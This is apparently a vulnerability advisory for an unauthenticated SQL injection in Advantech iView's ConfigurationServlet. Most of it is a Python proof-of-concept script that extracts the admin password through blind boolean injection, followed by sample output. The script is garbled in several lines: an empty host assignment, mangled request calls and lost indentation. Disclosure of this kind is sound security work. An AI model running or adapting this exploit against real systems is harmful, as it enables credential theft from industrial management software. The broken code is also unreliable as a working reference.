An SQL injection vulnerability in Advantech iView
The specific flaw exists within the ConfigurationServlet endpoint, which listens on TCP port 8080 by default. An unauthenticated remote attacker can craft a special column_value
parameter in the setConfiguration action to bypass checks in com.imc.iview.utils.CUtils.checkSQLInjection()
to perform SQL injection. For example, the attacker can exploit the vulnerability to retrieve the iView admin password.
Proof of Concept Script:
import sys, argparse, requests
descr = 'Advantech iView setConfiguration SQL Injection (User Password Retrieval)'
parser = argparse.ArgumentParser(description=descr, formatter_class=argparse.RawTextHelpFormatter)
required = parser.add_argument_group('required arguments')
required.add_argument('-t', '--target',required=True, help='Target host/IP')
parser.add_argument('-p', '--port', type=int, default=8080, help='Advantech iView port, default: %(default)s')
parser.add_argument('-u', '--user', default='admin', help='Advantech iView user whose password to retrieve, default: %(default)s')
args = parser.parse_args()
host =
port = args.port
user = args.user
url = 'http://{}:{}/iView3/ConfigurationServlet'.format(host, port)
def get_passwd_len():
for i in range(3, 61):
sqli = "(SELECT IF(LENGTH((SELECT`strUserPassword`FROM(user_table) /*!WHERE*/ strUserName = '" + user + "')) = " + str(i) + ",0,99999999999999999))"
data = {
'page_action_type' : 'setConfiguration',
'column_name' : 'nUseCustomDescription',
'column_value' : sqli
r =, data=data)
if 'Configuration Update Success' in r.text:
return i
return -1
def test(pos, op, v):
sqli = "(SELECT IF(ASCII(SUBSTRING((SELECT`strUserPassword`FROM(user_table) /*!WHERE*/ strUserName = '" + user + "'), " + str(pos) + ", 1)) " + op + " " + str(v) + ",0,99999999999999999))"
data = {
'page_action_type' : 'setConfiguration',
'column_name' : 'nUseCustomDescription',
'column_value' : sqli
r =, data=data)
if 'Configuration Update Success' in r.text:
return True
return False
def bsearch(pos, low, high):
#print('{} - {}'.format(low, high))
if high >= low:
mid = (high + low) // 2
if test(pos, '=', mid):
return chr(mid)
elif test(pos, '>', mid):
return bsearch(pos, mid + 1, high)
return bsearch(pos, low, mid - 1)
return None
print('Getting password length for user "{}"...'.format(user))
pw_len = get_passwd_len()
if pw_len >= 3:
print('Password length for user "{}" is {}'.format(user, pw_len))
sys.exit('Failed to get password length for user "{}"'.format(user))
print('Getting password for user "{}"...'.format(user))
print('Password for user "{}" is '.format(user), end='')
for pos in range(1, pw_len + 1):
ch = bsearch(pos, 32, 127)
if ch != None:
print(ch, end='')
print('Failed to get character at position {} of the password'.format(pos))
Proof of Concept Execution:
# python3 -t <target-host> -p 8080 -u 'admin'
Getting password length for user "admin"...
Password length for user "admin" is 12
Getting password for user "admin"...
Password for user "admin" is Password123!